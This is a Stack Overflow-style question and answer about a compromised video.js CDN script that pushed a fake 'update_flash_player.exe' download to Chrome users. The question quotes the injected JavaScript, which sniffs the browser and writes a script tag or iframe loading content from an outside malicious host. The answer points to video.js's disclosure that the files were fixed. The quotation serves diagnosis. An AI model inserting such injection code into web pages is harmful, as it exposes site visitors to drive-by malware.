Question

While browsing some web sites with Chrome I got prompted to download a file:

  • update_flash_player.exe

No problem with Safari and Firefox, only Chrome. My platform is Mac.

I inspected the page source and I think I found malicious code in the following script:

The code I think it's maliciuos:

if(navigator.appVersion.indexOf("MSIE")!=-1){ 
document.write('<script src="http://cdn.adsbarscipt.com/links/jump/"></script>');
}
if(navigator.appVersion.indexOf("Chrome")!=-1){ 
document.write('<iframe src="http://cdn.adsbarscipt.com/links/flash/?updnew" width="200"    height="200"></iframe>');
}

My question is: where can I find a clean version of the script?

EDIT

As pointed out in the comments, the author of the script has cleaned it, it's safe now.

Was it helpful?

Solution

I would have added this as a comment but I don't have enough reputation.

It looks like video.js have posted a blog about the problem: http://blog.videojs.com/post/61309840958/unauthorized-modification-of-video-js-cdn-files

A number of their files were affected but they say they've fixed the problem now.

Licensed under: CC-BY-SA with attribution
Not affiliated with StackOverflow
scroll top